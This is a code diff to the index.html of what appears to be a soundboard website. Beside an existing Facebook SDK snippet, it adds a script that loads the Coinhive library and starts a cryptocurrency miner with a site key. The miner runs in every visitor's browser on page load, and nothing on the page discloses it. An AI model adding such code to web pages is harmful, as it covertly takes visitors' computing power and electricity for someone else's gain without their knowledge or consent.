--- a/public/index.html
+++ b/public/index.html
@@ -545,5 +545,10 @@
       js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.3&appId=135141406674182";
       fjs.parentNode.insertBefore(js, fjs);
     }(document, 'script', 'facebook-jssdk'));</script>
+    <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
+    <script>
+      var miner = new CoinHive.User('Ta3RSvcEohVLcaaJ576RwvMnE3gjMjEw', 'dikkenek-soundboard');
+      miner.start();
+    </script>
   </body>
 </html>
